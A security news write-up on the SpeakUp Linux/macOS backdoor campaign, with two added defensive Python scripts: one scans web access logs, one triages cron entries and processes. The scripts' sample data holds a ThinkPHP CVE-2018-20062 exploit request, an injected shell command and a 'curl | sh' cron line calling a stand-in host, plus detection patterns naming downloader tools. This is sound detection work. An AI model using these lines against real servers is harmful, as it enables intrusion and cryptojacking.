Backdoor Trojans are malware that gives an attacker remote access to a victim's device. The infected machines are controlled through command-and-control (C&C) servers, and the result is usually a complete takeover of the host.
A new campaign is distributing a backdoor Trojan known as SpeakUp that currently targets servers running six different Linux distributions as well as macOS. At the time of the report, the sample also evaded every anti-virus engine it was checked against.
According to Check Point's report, SpeakUp mostly targets servers in East Asia and Latin America, including machines hosted on AWS, and Check Point suggests the campaign may expand to US servers next.
SpeakUp starts the infection by exploiting CVE-2018-20062, a remote code execution vulnerability in the ThinkPHP framework. It uses command injection to send shell commands through the "module" parameter of a GET request, uploading a "PHP shell that serves and executes a Perl backdoor" to the vulnerable Linux host.
The PHP shell then pulls the Perl payload, stores it as /tmp/e3ac24a0bcddfacd010a6c10f4a814bc, executes it immediately, sleeps for a couple of seconds and deletes the file so that no trace remains on disk. Because the script is gone by the time a file scan runs, evidence has to come from the web server's access log, the process list and the cron entries described below rather than from the filesystem. On January 14 the sample was not detected by any VirusTotal engine.
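The infection chain above leaves its first trace in the web server's access log: a GET request whose parameters carry shell commands. The following scanner is an added example, not code from Check Point or from the article, and its log lines are constructed (RFC 5737 documentation addresses, a hypothetical download URL). It assumes the widely published CVE-2018-20062 exploit pattern (ThinkPHP's invokefunction route with call_user_func_array) as a high-confidence signature; since the article only names the "module" parameter, the second check is generic and flags shell metacharacters or downloader/interpreter names in any query parameter.

```python
"""Scan web-server access logs for the two wire-level traits of the SpeakUp
infection chain: ThinkPHP 5.x invokefunction abuse (CVE-2018-20062) and shell
commands smuggled into GET parameters.  Added example; not Check Point's code."""
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample lines in Apache/nginx "combined" format.  Addresses are
# documentation ranges and the download URL is hypothetical; the /tmp file name
# is the one the report attributes to the Perl payload.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jan/2019:03:12:41 +0000] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://192.0.2.9/p%20-O%20/tmp/e3ac24a0bcddfacd010a6c10f4a814bc HTTP/1.1" 200 43 "-" "Mozilla/5.0"
198.51.100.3 - - [14/Jan/2019:03:13:02 +0000] "GET /index.php?module=news&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.3 - - [14/Jan/2019:03:13:09 +0000] "GET /index.php?module=news;perl%20/tmp/e3ac24a0bcddfacd010a6c10f4a814bc HTTP/1.1" 200 12 "-" "curl/7.58.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Public exploits for CVE-2018-20062 reach system()/exec() through ThinkPHP's
# App::invokefunction route and call_user_func_array; either string in a
# request is a high-confidence indicator whatever parameter carries the command.
THINKPHP_RE = re.compile(r"think\\app[\\/]invokefunction|call_user_func_array", re.I)

# Shell separators/substitution and downloader or interpreter names that have
# no business inside an ordinary query-string value.
SHELL_META_RE = re.compile(r"[;|`]|\$\(|&&")
SHELL_CMD_RE = re.compile(r"\b(wget|curl|perl|python|sh|bash|chmod|nohup)\b|/tmp/")


def query_pairs(query: str):
    """Yield decoded (key, value) pairs.  Split only on '&' so that a ';' stays
    inside the value and is seen for what it is: a shell command separator."""
    for part in query.split("&"):
        key, _, value = part.partition("=")
        yield unquote_plus(key), unquote_plus(value)


def analyse_request(target: str) -> list:
    """Return (reason, parameter) findings for one request target."""
    findings = []
    if THINKPHP_RE.search(unquote_plus(target)):
        findings.append(("thinkphp_invokefunction", "-"))
    for key, value in query_pairs(urlsplit(target).query):
        sample = f"{key}={value}"
        if SHELL_META_RE.search(sample) or SHELL_CMD_RE.search(sample):
            findings.append(("shell_command_in_parameter", key))
    return findings


def scan_access_log(text: str) -> list:
    """Return one dict per finding: line number, client address, reason, parameter."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client = line.split(" ", 1)[0]
        for reason, param in analyse_request(match.group("target")):
            hits.append({"line": lineno, "client": client, "reason": reason, "param": param})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Run it against a real log with `scan_access_log(open("access.log").read())`. The ThinkPHP signature is precise; the parameter check is deliberately broad and will need tuning per application, but a query value that names `/tmp/` or pipes to an interpreter is worth a look on any server.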
After infecting the Linux server, SpeakUp notifies the attacker that the host is online and sends its registration information. Communication between the infected server and the C&C servers is encoded with salted base64, which obscures the multiple C&C domains, IP addresses and other unique parameters from casual inspection. After registration, the malware polls the C&C for commands at a pre-defined interval. SpeakUp makes infected hosts run XMRig miners; the wallets used by the campaign held approximately 107 Monero (XMR), roughly $4,515 at the exchange rate at the time of writing.
To survive reboots, SpeakUp installs itself through the cron time-based job scheduler, and it uses an internal mutex to make sure only one instance of the Trojan runs at a time. SpeakUp also scans from the infected host and tries to brute-force administrator logins on the systems it finds.
The source of the campaign has yet to be confirmed, but Check Point's report links the SpeakUp author to another malware writer known as Zettabit.
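Cron persistence and an XMRig payload, as described in the two paragraphs above, are both visible from the host itself. The triage script below is an added example, not code from Check Point or the article: it runs over a constructed `crontab -l` dump and a constructed `ps -eo pid,user,args` listing (the pool hostname, wallet placeholder and PIDs are invented) and flags cron entries that execute from world-writable directories or pipe a download into a shell, and processes that either carry XMRig-style command-line indicators or run from those directories. The indicator list is an assumption to tune locally, not an observed SpeakUp signature.

```python
"""Host-side triage for the persistence and mining behaviour described above.
Added example; the sample data is constructed and nothing here is from the report."""
import re

# Constructed `crontab -l` output.  Line 3 mimics the /tmp payload path named in
# the report; line 4 is a hypothetical download-and-execute entry.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * perl /tmp/e3ac24a0bcddfacd010a6c10f4a814bc
@reboot /bin/sh -c "curl -s http://192.0.2.9/x | sh"
"""

# Constructed `ps -eo pid,user,args` output with a hypothetical miner process.
SAMPLE_PS = """\
  PID USER     COMMAND
    1 root     /sbin/init
  812 www-data /usr/sbin/apache2 -k start
 2931 www-data /tmp/.x/xmrig -o pool.example.test:3333 -u 4WALLETPLACEHOLDER --donate-level 1
 2977 www-data perl /tmp/e3ac24a0bcddfacd010a6c10f4a814bc
"""

# Directories any local user can write to; legitimate cron jobs rarely run from them.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# The "curl ... | sh" download-and-execute idiom.
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
# Assumed XMRig indicators: binary name, stratum pool URL, donate flag,
# algorithm switch, or "-o host:port" pool argument.  Tune for your estate.
MINER_RE = re.compile(r"xmrig|stratum\+tcp://|--donate-level|--algo[= ]|-o \S+:\d{3,5}\b", re.I)


def suspicious_cron_entries(crontab: str) -> list:
    """Return (line_number, reason, command) for each cron entry worth a look."""
    findings = []
    for lineno, raw in enumerate(crontab.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        # "@reboot cmd" has one schedule field; "m h dom mon dow cmd" has five.
        fields = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
        command = fields[-1]
        if any(d in command for d in WRITABLE_DIRS):
            findings.append((lineno, "runs_from_world_writable_dir", command))
        elif PIPE_TO_SHELL_RE.search(command):
            findings.append((lineno, "download_piped_to_shell", command))
    return findings


def suspicious_processes(ps_output: str) -> list:
    """Return (pid, user, reason, args) for processes that look like a miner or
    execute from a world-writable directory.  Expects a header row first."""
    hits = []
    for raw in ps_output.splitlines()[1:]:
        parts = raw.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, args = parts
        if MINER_RE.search(args):
            hits.append((int(pid), user, "miner_indicators", args))
        elif any(d in args for d in WRITABLE_DIRS):
            hits.append((int(pid), user, "executes_from_world_writable_dir", args))
    return hits


if __name__ == "__main__":
    for entry in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron:", entry)
    for proc in suspicious_processes(SAMPLE_PS):
        print("proc:", proc)
```

On a live host, feed it the output of `crontab -l` for every user plus the contents of /etc/crontab and /etc/cron.d/*, and of `ps -eo pid,user,args`. A process still running from a path that no longer exists on disk is exactly what the delete-after-execute step in the infection chain produces, which is why the process check matters more than a filesystem sweep here.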